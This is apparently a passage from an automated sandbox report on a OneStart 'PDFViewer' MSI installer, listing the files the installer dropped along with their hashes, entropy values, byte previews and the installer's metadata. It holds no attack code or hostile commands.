                      Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..03/19/2019 06:29:48.034 [4768]: Command line: D:\wd\compilerTemp\BMT.thr2gc0c.r44\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..03/19/2019 06:29:48.065 [4768]: Executing command from offline queue: install "System.IdentityModel.Selectors, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:3..03/19/2019 06:29:48.065 [4768]: Exclusion list entry found for System.IdentityModel.Selectors, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil; it will not be installed..03/19/2019 06:29:48.065 [4768]: Executing command from offline queue: install "System.AddIn.Contract, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=msil" /NoDependencies /queue:3..03/19/2019 06:29:48.065 [4768]: Exclusion
                      Process:C:\Windows\SysWOW64\msiexec.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):434
                      Entropy (8bit):3.6232959356698387
                      Encrypted:false
                      SSDEEP:
                      MD5:E441A19363EC37EE8C8937830CD6B27E
                      SHA1:1849B6880C999B2BF2DBA2E27E12D726EF4B104A
                      SHA-256:3CD5327E468D55CC8F1C79B86A97571F94CA92D37FCC695673A1698E9664244C
                      SHA-512:F43D702898BC74EC77BEEB563F43F9F13B9DE9A0509AECC48D3DEB769E31C60660EC6D64DEFE621B5FC29300CE35543BC84680B3A5907F8FB77AB99A9B53C502
                      Malicious:false
                      Reputation:low
                      Preview:......L....A..n...kF.......<... ................".................... .C.:.\.W.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.m.s.i.e.x.e.c...e.x.e..._./.i. .".C.:.\.U.s.e.r.s.\.a.l.f.r.e.d.o.\.D.e.s.k.t.o.p.\.P.D.F.V.i.e.w.e.r._.4.4.8.8.2.5.6.4. .(.1.)...m.s.i.". .A.D.D.L.O.C.A.L.=.B.B.W.C.,.D.e.s.k.t.o.p.B.a.r.,.M.a.i.n.F.e.a.t.u.r.e. .......A.L.F.R.E.D.O.-.P.C.\.a.l.f.r.e.d.o...................0.................9.............................
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:Composite Document File V2 Document, Cannot read section info
                      Category:dropped
                      Size (bytes):32768
                      Entropy (8bit):1.4303475141063178
                      Encrypted:false
                      SSDEEP:
                      MD5:27CC92DB51319912CCD3C06148B73BBD
                      SHA1:82BE479237DE13D99946C3606876960BCD4FEB34
                      SHA-256:C3835410D63C0D570E1D3191071E6B267FDD8C05FCD5B7B9E43D6369413EB9F1
                      SHA-512:BCF3372526C64D01C1946118D449FC69656BDA28A383AB492677150B5B88FC24279725632DF3ECFDC928A09796BDDA961B70C0893684A0F88FB8471657EC0C38
                      Malicious:false
                      Reputation:low
                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):73728
                      Entropy (8bit):0.23043318347027758
                      Encrypted:false
                      SSDEEP:
                      MD5:275D021BB08DB4BF26ED6D48DE6F11C6
                      SHA1:1C5186ED46BE6F5422224120DE55CE765378779D
                      SHA-256:5AF6D28B06BA3B98030419A23511BEDD5321E7A489D0EFDD36454097318F4674
                      SHA-512:BC4823C545DEBF4339E2DEB348DC0C6C9B6535FE011571DE1D699B34FB649DD85EBB6F5F6091E590E839FBFE410180AC1DDE3F4B0BBF611E855C96B69B084166
                      Malicious:false
                      Reputation:low
                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):512
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:
                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                      Malicious:false
                      Reputation:low
                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):32768
                      Entropy (8bit):0.07382680316930298
                      Encrypted:false
                      SSDEEP:
                      MD5:82D0B3AC04A7A9C3B8C747C96E463D40
                      SHA1:5AD9EACDA699C28E8D9CC331B778D9996BB69ABC
                      SHA-256:A1940FB1B5A2B441B08E809F8E7C9BA6036B27F65D13607484EFB77C65BA0D07
                      SHA-512:24F289966CADAE9F536C9EC2BE7D9A61FCD7AD50409CE45F5A553ECFE903593FD930B93DDEC461F32977FB4F81495AC47469ECE496AFA4CA8B887EE9057F8C57
                      Malicious:false
                      Reputation:low
                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:Composite Document File V2 Document, Cannot read section info
                      Category:dropped
                      Size (bytes):20480
                      Entropy (8bit):1.809104813201221
                      Encrypted:false
                      SSDEEP:
                      MD5:C275ED3C5EC6E4F585813E820ADCFBDC
                      SHA1:365639328275075C4D01A28E85A702AB43132C5E
                      SHA-256:E3BACDEB09EBA2E5582A36151ACEBDF277799F514FA3096E2D4856418FDDC6B6
                      SHA-512:CEDF330D736CDD8FB9B04A63B4A75627177CACDDCD103BBEECD08F8E1244C4E62570204C757401050E850E642FB74E6040851DDD564C5C2942012EE2BFEE1ED8
                      Malicious:false
                      Reputation:low
                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Dec 11 11:47:44 2009, Security: 0, Code page: 1252, Revision Number: {513C0B82-B6F3-4B16-80A5-0F807E70450D}, Number of Words: 10, Subject: OneStart Software, Author: OneStart.ai, Name of Creating Application: Advanced Installer 15.8 build b14c769f44, Template: ;1033, Comments: OneStart Software, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                      Entropy (8bit):7.980552918266732
                      TrID:
                      • Windows SDK Setup Transform Script (63028/2) 47.91%
                      • Microsoft Windows Installer (60509/1) 46.00%
                      • Generic OLE2 / Multistream Compound File (8008/1) 6.09%
                      File name:PDFViewer_44882564 (1).msi
                      File size:101'422'592 bytes
                      MD5:299098d3040c4ad8e52e0835e82c4ca7
                      SHA1:4a0e233aee3854a957baac068370394a571078a3
                      SHA256:39c81ea1223edf1f79d04ff5baefa8b2b95b9844972d564ef769dce3cab555c9
                      SHA512:3ebf3b8a1632127780a3002b92ff8c0a07bb5d4927a3a0298b999b1a4c9367fee808af6f3fd0488ca7687e9fe54d8709f5cf6705604901cec2e8b8a0b91ad3ab
                      SSDEEP:1572864:KEaDdKVqxGs985Ev0VGgWiBNM5BWSkfphFOIP1PO0rmosZpJdSk571JA:pwcMWOv0Be5QSYbOGW8mosZdD5e
                      TLSH:DC2833227986C936C1BF05701D29EB6E41BE7E250B7154DBA3DC6F2E1A728C24631F63
                      File Content Preview:........................>............................................3...................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4..
                      Icon Hash:2d2e3797b32b2b99